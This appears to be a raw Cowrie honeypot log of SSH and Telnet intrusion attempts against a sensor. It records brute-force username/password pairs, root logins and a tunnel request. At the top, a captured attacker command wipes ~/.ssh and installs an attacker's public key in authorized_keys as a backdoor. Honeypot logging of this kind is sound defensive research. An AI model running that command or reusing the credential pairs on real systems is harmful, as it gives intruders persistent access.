{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:11:03.572109Z","src_ip":"212.227.235.229","session":"2875140424fc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:11:03.815765Z","src_ip":"212.227.235.229","session":"2875140424fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:11:03.816711Z","src_ip":"212.227.235.229","session":"2875140424fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56906,"dst_ip":"1.2.3.4","dst_port":22,"session":"42251555eb93","protocol":"ssh","message":"New connection: 212.227.235.229:56906 (1.2.3.4:22) [session: 42251555eb93]","sensor":"my-vps","timestamp":"2025-09-09T07:11:04.058381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:11:04.059123Z","src_ip":"212.227.235.229","session":"42251555eb93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:11:04.301971Z","src_ip":"212.227.235.229","session":"42251555eb93"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:11:05.312343Z","src_ip":"212.227.235.229","session":"42251555eb93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57337,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cbcd9d630e6","protocol":"ssh","message":"New connection: 212.227.235.229:57337 (1.2.3.4:22) [session: 5cbcd9d630e6]","sensor":"my-vps","timestamp":"2025-09-09T07:11:06.796091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:11:06.797607Z","src_ip":"212.227.235.229","session":"5cbcd9d630e6"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:11:06.861402Z","src_ip":"212.227.235.229","session":"42251555eb93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:11:07.037871Z","src_ip":"212.227.235.229","session":"5cbcd9d630e6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:11:08.001545Z","src_ip":"212.227.235.229","session":"5cbcd9d630e6"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:11:08.245365Z","src_ip":"212.227.235.229","session":"2875140424fc"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:11:08.246364Z","src_ip":"212.227.235.229","session":"5cbcd9d630e6"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":44396,"dst_ip":"1.2.3.4","dst_port":22,"session":"736bd80cb752","protocol":"ssh","message":"New connection: 92.118.39.62:44396 (1.2.3.4:22) [session: 736bd80cb752]","sensor":"my-vps","timestamp":"2025-09-09T07:11:47.765008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:11:47.765815Z","src_ip":"92.118.39.62","session":"736bd80cb752"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T07:11:47.797294Z","src_ip":"92.118.39.62","session":"736bd80cb752"}
{"eventid":"cowrie.login.failed","username":"clay","password":"clay12345","message":"login attempt [clay/clay12345] failed","sensor":"my-vps","timestamp":"2025-09-09T07:11:47.888619Z","src_ip":"92.118.39.62","session":"736bd80cb752"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:11:48.922281Z","src_ip":"92.118.39.62","session":"736bd80cb752"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57530,"dst_ip":"1.2.3.4","dst_port":23,"session":"cd24e9c6e3bc","protocol":"telnet","message":"New connection: 212.227.125.160:57530 (1.2.3.4:23) [session: cd24e9c6e3bc]","sensor":"my-vps","timestamp":"2025-09-09T07:11:50.963699Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:11:51.047300Z","src_ip":"212.227.125.160","session":"cd24e9c6e3bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:11:51.067580Z","src_ip":"212.227.125.160","session":"cd24e9c6e3bc"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T07:11:51.068744Z","src_ip":"212.227.125.160","session":"cd24e9c6e3bc"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T07:11:51.069761Z","src_ip":"212.227.125.160","session":"cd24e9c6e3bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40920,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e0eb167a132","protocol":"ssh","message":"New connection: 212.227.235.229:40920 (1.2.3.4:22) [session: 1e0eb167a132]","sensor":"my-vps","timestamp":"2025-09-09T07:12:16.193567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:12:16.194508Z","src_ip":"212.227.235.229","session":"1e0eb167a132"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:12:16.445252Z","src_ip":"212.227.235.229","session":"1e0eb167a132"}
{"eventid":"cowrie.login.failed","username":"testserver","password":"testserver123","message":"login attempt [testserver/testserver123] failed","sensor":"my-vps","timestamp":"2025-09-09T07:12:17.467764Z","src_ip":"212.227.235.229","session":"1e0eb167a132"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:12:18.714797Z","src_ip":"212.227.235.229","session":"1e0eb167a132"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37401,"dst_ip":"1.2.3.4","dst_port":23,"session":"61893873e478","protocol":"telnet","message":"New connection: 212.227.125.160:37401 (1.2.3.4:23) [session: 61893873e478]","sensor":"my-vps","timestamp":"2025-09-09T07:12:50.801617Z"}
{"eventid":"cowrie.session.closed","duration":31.70982074737549,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:13:22.511369Z","src_ip":"212.227.125.160","session":"61893873e478"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55022,"dst_ip":"1.2.3.4","dst_port":22,"session":"35bd0f058a1e","protocol":"ssh","message":"New connection: 212.227.235.229:55022 (1.2.3.4:22) [session: 35bd0f058a1e]","sensor":"my-vps","timestamp":"2025-09-09T07:13:57.787027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:13:57.792361Z","src_ip":"212.227.235.229","session":"35bd0f058a1e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T07:13:57.963219Z","src_ip":"212.227.235.229","session":"35bd0f058a1e"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:14:05.793821Z","src_ip":"212.227.235.229","session":"35bd0f058a1e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:14:51.068410Z","src_ip":"212.227.125.160","session":"cd24e9c6e3bc"}
{"eventid":"cowrie.session.closed","duration":180.11060452461243,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:14:51.074235Z","src_ip":"212.227.125.160","session":"cd24e9c6e3bc"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50662,"dst_ip":"1.2.3.4","dst_port":22,"session":"95ce77cb3129","protocol":"ssh","message":"New connection: 217.72.205.35:50662 (1.2.3.4:22) [session: 95ce77cb3129]","sensor":"my-vps","timestamp":"2025-09-09T07:14:58.692408Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:14:58.693531Z","src_ip":"217.72.205.35","session":"95ce77cb3129"}
{"eventid":"cowrie.session.connect","src_ip":"185.156.73.235","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"31f6a409b06a","protocol":"ssh","message":"New connection: 185.156.73.235:64001 (1.2.3.4:22) [session: 31f6a409b06a]","sensor":"my-vps","timestamp":"2025-09-09T07:17:03.615813Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:17:03.638606Z","src_ip":"185.156.73.235","session":"31f6a409b06a"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":53290,"dst_ip":"1.2.3.4","dst_port":22,"session":"25656d8207a8","protocol":"ssh","message":"New connection: 92.118.39.62:53290 (1.2.3.4:22) [session: 25656d8207a8]","sensor":"my-vps","timestamp":"2025-09-09T07:18:08.912248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:18:08.913014Z","src_ip":"92.118.39.62","session":"25656d8207a8"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T07:18:08.943332Z","src_ip":"92.118.39.62","session":"25656d8207a8"}
{"eventid":"cowrie.login.failed","username":"cyberpanel","password":"panel","message":"login attempt [cyberpanel/panel] failed","sensor":"my-vps","timestamp":"2025-09-09T07:18:09.035825Z","src_ip":"92.118.39.62","session":"25656d8207a8"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:18:10.067659Z","src_ip":"92.118.39.62","session":"25656d8207a8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62186,"dst_ip":"1.2.3.4","dst_port":22,"session":"454fc64d2fa9","protocol":"ssh","message":"New connection: 217.72.205.35:62186 (1.2.3.4:22) [session: 454fc64d2fa9]","sensor":"my-vps","timestamp":"2025-09-09T07:21:34.465744Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:21:34.466817Z","src_ip":"217.72.205.35","session":"454fc64d2fa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42519,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef74a82153f7","protocol":"ssh","message":"New connection: 212.227.235.229:42519 (1.2.3.4:22) [session: ef74a82153f7]","sensor":"my-vps","timestamp":"2025-09-09T07:22:04.308041Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:22:04.309240Z","src_ip":"212.227.235.229","session":"ef74a82153f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42874,"dst_ip":"1.2.3.4","dst_port":22,"session":"17d1cfcfde3f","protocol":"ssh","message":"New connection: 212.227.235.229:42874 (1.2.3.4:22) [session: 17d1cfcfde3f]","sensor":"my-vps","timestamp":"2025-09-09T07:22:04.408792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:22:04.409785Z","src_ip":"212.227.235.229","session":"17d1cfcfde3f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T07:22:04.539093Z","src_ip":"212.227.235.229","session":"17d1cfcfde3f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:22:04.929421Z","src_ip":"212.227.235.229","session":"17d1cfcfde3f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T07:22:05.059826Z","session":"17d1cfcfde3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43362,"dst_ip":"1.2.3.4","dst_port":23,"session":"f1c6ee214682","protocol":"telnet","message":"New connection: 212.227.235.229:43362 (1.2.3.4:23) [session: f1c6ee214682]","sensor":"my-vps","timestamp":"2025-09-09T07:22:44.998903Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60022,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd4f4a54af60","protocol":"telnet","message":"New connection: 212.227.125.160:60022 (1.2.3.4:23) [session: bd4f4a54af60]","sensor":"my-vps","timestamp":"2025-09-09T07:22:49.001245Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3536,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b0e2f4a1db1","protocol":"telnet","message":"New connection: 212.227.125.160:3536 (1.2.3.4:23) [session: 2b0e2f4a1db1]","sensor":"my-vps","timestamp":"2025-09-09T07:23:02.904821Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.125.160:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.125.160:23] failed","sensor":"my-vps","timestamp":"2025-09-09T07:23:02.906154Z","src_ip":"212.227.125.160","session":"2b0e2f4a1db1"}
